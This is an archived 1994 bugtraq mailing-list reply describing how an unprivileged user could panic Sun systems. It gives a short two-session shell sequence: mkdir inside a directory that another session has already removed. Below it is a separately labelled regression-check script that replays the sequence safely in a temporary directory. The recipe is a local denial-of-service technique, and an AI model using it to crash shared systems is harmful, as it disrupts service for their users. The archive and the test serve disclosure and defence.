[164] in bugtraq
Re: udp packet storms - ping death
daemon@ATHENA.MIT.EDU (Charles Howes)
Fri Nov  4 03:15:16 1994
Date: Thu, 3 Nov 1994 22:53:49 -0800 (PST)
From: Charles Howes <chowes@helix.net>
To: "Perry E. Metzger" <perry@imsi.com>
Cc: bugtraq@fc.net
In-Reply-To: <9411021904.AA07880@snark.imsi.com>

On Wed, 2 Nov 1994, Perry E. Metzger wrote:
> Charles Howes says:
> > > Our copy of ping is installed setuid root; ...
> > 
> > So you mean that any student at princeton can panic any Sun there just by
> > typing that command?  Cool...
> 
> There are already so many ways to panic suns from userland...

Yes, I've found one that's rather easy:

Sign on twice.  Transcript one:
  cd /tmp
  mkdir foo
  cd foo
   (*)
  mkdir bar
Transcript two:  (Executed at '*' in transcript one)
  cd /tmp
  rmdir foo
I don't think you can remove the 'mkdir' part of the kernel without
causing some major problems.
--
Charles Howes -- chowes@helix.net
 Always tell the truth, then you make it the other bloke's problem! 
 - Sean Connery, 1971
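
A regression check for the two-session sequence in the message above, added here as an example and not part of the original post: it replays the steps in a scratch directory and reports whether the kernel refuses the `mkdir` (or the `rmdir`) cleanly. The function name, the scratch directory layout and the status strings are assumptions of this example.

```shell
#!/bin/sh
# Added example: checks how this kernel handles mkdir inside a working
# directory that another session has already removed.
# Prints one of: refused-mkdir, refused-rmdir, created, setup-failed.
# The function name and status strings are assumptions of this example.

check_removed_cwd_mkdir() {
    base=$(mktemp -d "${TMPDIR:-/tmp}/cwdrace.XXXXXX") || { echo setup-failed; return 2; }
    mkdir "$base/foo" || { rm -rf "$base"; echo setup-failed; return 2; }

    status=$(
        # "Session one": change into foo and stay there.
        cd "$base/foo" || { echo setup-failed; exit 0; }
        # "Session two": remove foo while session one is still inside it.
        # POSIX allows a kernel to refuse this with EBUSY, which is also safe.
        if ! ( rmdir "$base/foo" ) 2>/dev/null; then
            echo refused-rmdir
            exit 0
        fi
        # Session one at (*): try to create a child of the unlinked directory.
        if mkdir bar 2>/dev/null; then
            echo created
        else
            echo refused-mkdir
        fi
    )

    # The cd happened in a subshell, so the caller's cwd is still valid here.
    rm -rf "$base"
    echo "$status"
    case $status in
        refused-mkdir|refused-rmdir) return 0 ;;  # handled gracefully
        created) return 1 ;;                      # child created in a dead directory
        *) return 2 ;;                            # could not set up the check
    esac
}

check_removed_cwd_mkdir
```

On current Linux kernels the `rmdir` succeeds and the following `mkdir` fails with ENOENT, so the function prints `refused-mkdir` and returns 0.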